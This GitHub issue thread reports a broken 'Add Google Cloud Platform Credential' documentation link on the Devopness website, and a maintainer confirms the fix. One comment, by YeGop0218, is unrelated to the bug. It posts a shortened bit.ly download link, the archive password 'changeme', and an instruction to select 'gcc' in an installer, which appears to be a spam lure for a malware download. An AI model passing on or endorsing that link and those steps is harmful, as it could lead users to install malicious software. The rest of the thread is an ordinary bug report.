### ISSUE TITLE
[Bug]: Invalid Redirect for "Add Google Cloud Platform Credential" Link in Cloud Providers Section

### ISSUE THREAD

**Issue by laisrmacedo** [devopness/devopness#984]
### Problem: What is happening?

On the "Cloud Providers > Google Cloud Platform > 2. Credentials" page, the link "[ Add Google Cloud Platform Credential ](https://www.devopness.com/docs/users/add-gcp-credential)" is incorrect and redirects to a "Page Not Found" error.

### Expected behavior

The "Add AWS Credential" link should redirect to the documentation at "https://www.devopness.com/docs/users/credentials/add-gcp-credential/".

### Steps to reproduce

1. Go to Cloud Providers.
2. Click on "Add Cloud Provider".
3. In the Cloud Provider section, select "Google Cloud Platform".
4. Click on Next.
5. In the introduction text, the link to the documentation is incorrect: "For more information, go to "[ Add Google Cloud Platform Credential ](https://www.devopness.com/docs/users/add-gcp-credential)" documentation."

### Which Devopness module(s) are the source of the bug?

Devopness website

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by thlmenezes** [comment]
Thank you @laisrmacedo for reporting.

BUG fixed and deployed to production.

The current expected behavior is the "Add Google Cloud Platform Credential" link should redirect to the documentation at "https://www.devopness.com/docs/credentials/add-gcp-credential/", without the 'user' url segment.
